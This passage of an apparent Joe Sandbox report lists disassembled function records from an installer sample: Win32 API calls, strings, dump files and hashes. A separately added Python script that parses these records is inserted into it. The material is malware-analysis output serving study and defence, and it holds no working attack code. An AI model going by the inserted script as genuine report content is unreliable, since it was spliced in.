                                                                           • Associated: 00000000.00000002.2045988378.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.2046056811.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.2046098269.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.2046098269.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.2046098269.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.2046207074.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                          Similarity
                                                                          • API ID: Char$Next$CreateDirectoryPrev
                                                                          • String ID:
                                                                          • API String ID: 4115351271-0
                                                                          • Opcode ID: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
                                                                          • Instruction ID: 8ea1286759415c6f695425ed34242866ebe8a7a529327a4e56f2759b30593fc1
                                                                          • Opcode Fuzzy Hash: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
                                                                          • Instruction Fuzzy Hash: B1D0A921083C3221C562332A3D06FCF090C8F2635AB02C07BF841B61CA8B2C4B8240EE
                                                                          APIs
                                                                          • SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040375A,?,?,?,?,00000000,00403A47,?), ref: 00403376
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2046019490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000000.00000002.2045988378.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.2046056811.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.2046098269.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.2046098269.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.2046098269.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.2046207074.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                          Similarity
                                                                          • API ID: FilePointer
                                                                          • String ID:
                                                                          • API String ID: 973152223-0
                                                                          • Opcode ID: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
                                                                          • Instruction ID: da19c3e449f5d10d282cbd9bcc1d8f2f369397d5e390659c1e8fea63e82898b0
                                                                          • Opcode Fuzzy Hash: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
                                                                          • Instruction Fuzzy Hash: 0CB09231140204AEDA214B109E05F067A21FB94700F208824B2A0380F086711420EA0C
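The function records in this report list each resolved Win32 call as `API.MODULE(args), ref: ADDRESS`, and each "Memory Dump Source" block names the dump files (with base address and page protection encoded in the file name) that the call sites live in. The following Python script is an added example for triaging such records offline; it is not part of Joe Sandbox or of this report. The sample lines are copied verbatim from this report's "APIs" and "Memory Dump Source" entries; the field layout of the `.sdmp` names (base address, page protection, allocation type) is inferred from the names on this page and is an assumption, as is treating the dumped regions as contiguous, since the report gives bases but not sizes.

```python
"""Parse the per-function "APIs" entries of a Joe Sandbox text report and resolve each
`ref:` call-site address against the regions listed under "Memory Dump Source".
Added example, not part of the report; sample data copied from this report's entries."""
import re
from collections import Counter

# Entries copied verbatim from the report. The "Part of subcall function" prefix marks
# calls made by a callee rather than by the function whose record they appear in.
SAMPLE_API_LINES = [
    "• GlobalFree.KERNELBASE(?), ref: 004073C5",
    "• GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 004073CE",
    "• GetFileAttributesW.KERNELBASE(?,00406E81,?,?,?), ref: 00405E34",
    "• SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E47",
    "  • Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA",
    "• CreateDirectoryW.KERNELBASE(004D70C8,00000000,004D70C8,004D70C8,004D70C8,-00000002,00403A0B), ref: 004037ED",
    "• CreatePopupMenu.USER32 ref: 00405376",
    "• GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 0040541D",
]

# Dump file names copied from the "Memory Dump Source" lists. Field layout is inferred
# from these names (assumption): field 3 is the region base, field 4 the page protection
# (Windows PAGE_* constants), field 6 the allocation type (0x1000000 = MEM_IMAGE).
SAMPLE_DUMP_NAMES = [
    "00000000.00000002.2045988378.0000000000400000.00000002.00000001.01000000.00000003.sdmp",
    "00000000.00000002.2046019490.0000000000401000.00000020.00000001.01000000.00000003.sdmp",
    "00000000.00000002.2046056811.0000000000408000.00000002.00000001.01000000.00000003.sdmp",
    "00000000.00000002.2046098269.000000000040B000.00000004.00000001.01000000.00000003.sdmp",
    "00000000.00000002.2046098269.000000000041F000.00000004.00000001.01000000.00000003.sdmp",
    "00000000.00000002.2046098269.0000000000461000.00000004.00000001.01000000.00000003.sdmp",
    "00000000.00000002.2046207074.00000000004F4000.00000002.00000001.01000000.00000003.sdmp",
]

PAGE_PROTECTION = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE", 0x20: "PAGE_EXECUTE_READ"}

# Greedy ".*" for the argument list so nested parentheses inside string arguments
# (e.g. the RMDir format strings in this report) do not cut the match short.
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>.*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)


def parse_arg(tok):
    """'?' means the analyser could not resolve the argument; hex values become ints,
    anything else (a string literal the analyser recovered) is kept as printed."""
    tok = tok.strip()
    if tok == "?":
        return None
    neg = tok.startswith("-")
    try:
        val = int(tok.lstrip("-"), 16)
    except ValueError:
        return tok
    return -val if neg else val


def parse_api_line(line):
    m = API_RE.match(line)
    if not m:
        raise ValueError("not an API entry: " + line)
    args = m.group("args")
    return {
        "api": m.group("api"),
        "module": m.group("mod"),
        "args": [] if args is None else [parse_arg(a) for a in args.split(",")],
        "ref": int(m.group("ref"), 16),
        "subcall_of": int(m.group("sub"), 16) if m.group("sub") else None,
    }


def parse_dump_name(name):
    f = name.split(".")
    prot = int(f[4], 16)
    return {"base": int(f[3], 16), "protection": PAGE_PROTECTION.get(prot, hex(prot)),
            "image": int(f[6], 16) & 0x1000000 != 0, "file": name}


def region_for(addr, regions):
    """Region whose base is the highest one not above addr. Assumes the dumped regions
    are contiguous, because the report lists bases but not sizes."""
    cands = [r for r in regions if r["base"] <= addr]
    return max(cands, key=lambda r: r["base"]) if cands else None


def summarize(lines, dump_names):
    regions = [parse_dump_name(n) for n in dump_names]
    calls = [parse_api_line(l) for l in lines]
    by_module = Counter(c["module"] for c in calls)
    # Every call site should sit in an executable region; a site in a non-executable
    # region would point at a dump that does not match the code actually run.
    site_prot = {hex(c["ref"]): region_for(c["ref"], regions)["protection"] for c in calls}
    return calls, by_module, site_prot, regions


if __name__ == "__main__":
    calls, by_module, site_prot, regions = summarize(SAMPLE_API_LINES, SAMPLE_DUMP_NAMES)
    for c in calls:
        print(f"{c['ref']:08X} {site_prot[hex(c['ref'])]:<18} {c['module']}!{c['api']} {c['args']}")
    print(dict(by_module))
    # A GlobalAlloc argument from the report that points into the writable data region:
    print(hex(0x41F150), region_for(0x41F150, regions)["protection"])
```

Resolving the `ref:` addresses this way is a quick sanity check that the disassembly records were taken from the `00401000` executable region rather than from a data dump, and the same lookup applied to pointer-sized arguments (such as `0041F150` in the GlobalAlloc call) separates pointers into the image's writable data from plain integer flags like `00000040`.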
                                                                          APIs
                                                                          • GetDlgItem.USER32(?,00000403), ref: 0040512F
                                                                          • GetDlgItem.USER32(?,000003EE), ref: 0040513E
                                                                          • GetClientRect.USER32(?,?), ref: 00405196
                                                                          • GetSystemMetrics.USER32(00000015), ref: 0040519E
                                                                          • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051BF
                                                                          • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051D0
                                                                          • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004051E3
                                                                          • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004051F1
                                                                          • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405204
                                                                          • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405226
                                                                          • ShowWindow.USER32(?,00000008), ref: 0040523A
                                                                          • GetDlgItem.USER32(?,000003EC), ref: 0040525B
                                                                          • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040526B
                                                                          • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405280
                                                                          • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 0040528C
                                                                          • GetDlgItem.USER32(?,000003F8), ref: 0040514D
                                                                            • Part of subcall function 00403D98: SendMessageW.USER32(00000028,?,00000001,004057B4), ref: 00403DA6
                                                                            • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                          • GetDlgItem.USER32(?,000003EC), ref: 004052AB
                                                                          • CreateThread.KERNEL32(00000000,00000000,Function_00005047,00000000), ref: 004052B9
                                                                          • CloseHandle.KERNEL32(00000000), ref: 004052C0
                                                                          • ShowWindow.USER32(00000000), ref: 004052E7
                                                                          • ShowWindow.USER32(?,00000008), ref: 004052EC
                                                                          • ShowWindow.USER32(00000008), ref: 00405333
                                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405365
                                                                          • CreatePopupMenu.USER32 ref: 00405376
                                                                          • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 0040538B
                                                                          • GetWindowRect.USER32(?,?), ref: 0040539E
                                                                          • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053C0
                                                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 004053FB
                                                                          • OpenClipboard.USER32(00000000), ref: 0040540B
                                                                          • EmptyClipboard.USER32 ref: 00405411
                                                                          • GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 0040541D
                                                                          • GlobalLock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 00405427
                                                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040543B
                                                                          • GlobalUnlock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 0040545D
                                                                          • SetClipboardData.USER32(0000000D,00000000), ref: 00405468
                                                                          • CloseClipboard.USER32 ref: 0040546E
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2046019490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2045988378.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046056811.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046098269.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046098269.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046098269.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046207074.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
                                                                          • String ID: @rD$New install of "%s" to "%s"${
                                                                          • API String ID: 2110491804-2409696222
                                                                          • Opcode ID: a32262366b6956f6ce6576a17cc772d230ae976b6d31d5dbcf7d3a173ee933fc
                                                                          • Instruction ID: 480b9f2609884c7685ddca5963e0cfcc77f9e358d06567921943d8ab7e89b76b
                                                                          • Opcode Fuzzy Hash: a32262366b6956f6ce6576a17cc772d230ae976b6d31d5dbcf7d3a173ee933fc
                                                                          • Instruction Fuzzy Hash: 14B15B70800608FFDB11AFA0DD85EAE7B79EF44355F00803AFA45BA1A0CBB49A519F59
                                                                          APIs
                                                                          • GetDlgItem.USER32(?,000003F9), ref: 00404993
                                                                          • GetDlgItem.USER32(?,00000408), ref: 004049A0
                                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 004049EF
                                                                          • LoadBitmapW.USER32(0000006E), ref: 00404A02
                                                                          • SetWindowLongW.USER32(?,000000FC,Function_000048CC), ref: 00404A1C
                                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A2E
                                                                          • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A42
                                                                          • SendMessageW.USER32(?,00001109,00000002), ref: 00404A58
                                                                          • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A64
                                                                          • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404A74
                                                                          • DeleteObject.GDI32(?), ref: 00404A79
                                                                          • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AA4
                                                                          • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404AB0
                                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B51
                                                                          • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404B74
                                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B85
                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00404BAF
                                                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BBE
                                                                          • ShowWindow.USER32(?,00000005), ref: 00404BCF
                                                                          • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CCD
                                                                          • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D28
                                                                          • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D3D
                                                                          • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D61
                                                                          • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404D87
                                                                          • ImageList_Destroy.COMCTL32(?), ref: 00404D9C
                                                                          • GlobalFree.KERNEL32(?), ref: 00404DAC
                                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E1C
                                                                          • SendMessageW.USER32(?,00001102,?,?), ref: 00404ECA
                                                                          • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404ED9
                                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00404EF9
                                                                          • ShowWindow.USER32(?,00000000), ref: 00404F49
                                                                          • GetDlgItem.USER32(?,000003FE), ref: 00404F54
                                                                          • ShowWindow.USER32(00000000), ref: 00404F5B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2046019490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2045988378.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046056811.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046098269.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046098269.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046098269.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046207074.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                          • String ID: $ @$M$N
                                                                          • API String ID: 1638840714-3479655940
                                                                          • Opcode ID: 222e44079ed98782fbb34ec8da515d99173e785f6e02dcb26c66960398e67004
                                                                          • Instruction ID: e2b6c32447eba08f07ab18e4c0942225b167af9b9c7e550a0b0592367213937f
                                                                          • Opcode Fuzzy Hash: 222e44079ed98782fbb34ec8da515d99173e785f6e02dcb26c66960398e67004
                                                                          • Instruction Fuzzy Hash: 09026CB0900209AFEF209FA4CD45AAE7BB5FB84314F10413AF615B62E1D7B89D91DF58
                                                                          APIs
                                                                          • GetDlgItem.USER32(?,000003F0), ref: 004044F9
                                                                          • IsDlgButtonChecked.USER32(?,000003F0), ref: 00404507
                                                                          • GetDlgItem.USER32(?,000003FB), ref: 00404527
                                                                          • GetAsyncKeyState.USER32(00000010), ref: 0040452E
                                                                          • GetDlgItem.USER32(?,000003F0), ref: 00404543
                                                                          • ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404554
                                                                          • SetWindowTextW.USER32(?,?), ref: 00404583
                                                                          • SHBrowseForFolderW.SHELL32(?), ref: 0040463D
                                                                          • lstrcmpiW.KERNEL32(00462540,00447240,00000000,?,?), ref: 0040467A
                                                                          • lstrcatW.KERNEL32(?,00462540), ref: 00404686
                                                                          • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404696
                                                                          • CoTaskMemFree.OLE32(00000000), ref: 00404648
                                                                            • Part of subcall function 00405C84: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403F81), ref: 00405C97
                                                                            • Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                                                            • Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                                                            • Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                                                            • Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                                                            • Part of subcall function 00403E74: lstrcatW.KERNEL32(00000000,00000000), ref: 00403E8F
                                                                          • GetDiskFreeSpaceW.KERNEL32(00443238,?,?,0000040F,?,00443238,00443238,?,00000000,00443238,?,?,000003FB,?), ref: 00404759
                                                                          • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404774
                                                                            • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                          • SetDlgItemTextW.USER32(00000000,00000400,00409264), ref: 004047ED
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2046019490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2045988378.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046056811.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046098269.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046098269.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046098269.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046207074.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                          Similarity
                                                                          • API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
                                                                          • String ID: 82D$@%F$@rD$A
                                                                          • API String ID: 3347642858-1086125096
                                                                          • Opcode ID: 41223eded68e0cc8c9bf9fa9bd2dae48608aba550ad56c91da83586f0d18507e
                                                                          • Instruction ID: 5c5d6a603380bcdbc7d7d35b60f5621b43697e5e98684918e033f9398a36e476
                                                                          • Opcode Fuzzy Hash: 41223eded68e0cc8c9bf9fa9bd2dae48608aba550ad56c91da83586f0d18507e
                                                                          • Instruction Fuzzy Hash: D1B1A4B1900209BBDB11AFA1CD85AAF7AB8EF45314F10847BF605B72D1D77C8A41CB59
                                                                          APIs
                                                                          • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6
                                                                          • ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F30
                                                                          • ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FA9
                                                                          • lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FB5
                                                                          • lstrcmpA.KERNEL32(name,?), ref: 00406FC7
                                                                          • CloseHandle.KERNEL32(?), ref: 004071E6
                                                                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2046019490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2045988378.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046056811.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046098269.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046098269.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046098269.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046207074.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                          Similarity
                                                                          • API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
                                                                          • String ID: %s: failed opening file "%s"$GetTTFNameString$name
                                                                          • API String ID: 1916479912-1189179171
                                                                          • Opcode ID: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
                                                                          • Instruction ID: 34713ba181b26839f7619e948cf229fd8716e5ee99c03f3e8673f79b0d3e70cf
                                                                          • Opcode Fuzzy Hash: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
                                                                          • Instruction Fuzzy Hash: 9091BF70D1412DAACF04EBA5DD909FEBBBAEF48301F00416AF592F72D0E6785A05DB64
                                                                          APIs
                                                                          • DeleteFileW.KERNEL32(?,?,004C30A0), ref: 00406CB8
                                                                          • lstrcatW.KERNEL32(0045C918,\*.*), ref: 00406D09
                                                                          • lstrcatW.KERNEL32(?,00408838), ref: 00406D29
                                                                          • lstrlenW.KERNEL32(?), ref: 00406D2C
                                                                          • FindFirstFileW.KERNEL32(0045C918,?), ref: 00406D40
                                                                          • FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E22
                                                                          • FindClose.KERNEL32(?), ref: 00406E33
                                                                          Strings
                                                                          • RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406E93
                                                                          • Delete: DeleteFile on Reboot("%s"), xrefs: 00406DE0
                                                                          • Delete: DeleteFile failed("%s"), xrefs: 00406DFD
                                                                          • RMDir: RemoveDirectory failed("%s"), xrefs: 00406EB0
                                                                          • RMDir: RemoveDirectory("%s"), xrefs: 00406E6F
                                                                          • Delete: DeleteFile("%s"), xrefs: 00406DBC
                                                                          • \*.*, xrefs: 00406D03
                                                                          • RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E58
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2046019490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2045988378.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046056811.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046098269.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046098269.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046098269.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046207074.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                          Similarity
                                                                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                          • String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*
                                                                          • API String ID: 2035342205-3294556389
                                                                          • Opcode ID: 929039bad7d15a30b60f6521e1025dcf5eb1071aca27ca1d219e219807f84f48
                                                                          • Instruction ID: 0ca3ec5a28b3c1cae8259a28e21d86b18febecd5c0179aed135e39ed79665852
                                                                          • Opcode Fuzzy Hash: 929039bad7d15a30b60f6521e1025dcf5eb1071aca27ca1d219e219807f84f48
                                                                          • Instruction Fuzzy Hash: 2D51E3315043056ADB20AB61CD46EAF37B89F81725F22803FF943751D2DB7C49A2DAAD
                                                                          APIs
                                                                          • GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                          • GetSystemDirectoryW.KERNEL32(00462540,00002004), ref: 00406958
                                                                            • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                          • GetWindowsDirectoryW.KERNEL32(00462540,00002004), ref: 0040696B
                                                                          • lstrcatW.KERNEL32(00462540,\Microsoft\Internet Explorer\Quick Launch), ref: 004069E5
                                                                          • lstrlenW.KERNEL32(00462540,0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 00406A47
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2046019490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2045988378.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046056811.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046098269.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046098269.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046098269.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046207074.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                          Similarity
                                                                          • API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
                                                                          • String ID: @%F$@%F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                          • API String ID: 3581403547-784952888
                                                                          • Opcode ID: 5b9b76f287d52b653a8a41dc6b1224aada0ccbd74d66441f1f03372adecf381e
                                                                          • Instruction ID: 7881bd453c5698e0e02013fa1c3524f2cf467b60749c67c5a59258f73e57ab2a
                                                                          • Opcode Fuzzy Hash: 5b9b76f287d52b653a8a41dc6b1224aada0ccbd74d66441f1f03372adecf381e
                                                                          • Instruction Fuzzy Hash: F171F4B1A00215ABDB20AF28CD44A7E3771EF55314F12C03FE906B62E0E77C89A19B5D
                                                                          APIs
                                                                          • CoCreateInstance.OLE32(00409B24,?,00000001,00409B04,?), ref: 0040257E
                                                                          Strings
                                                                          • CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2046019490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2045988378.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046056811.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046098269.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046098269.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046098269.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046207074.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                          Similarity
                                                                          • API ID: CreateInstance
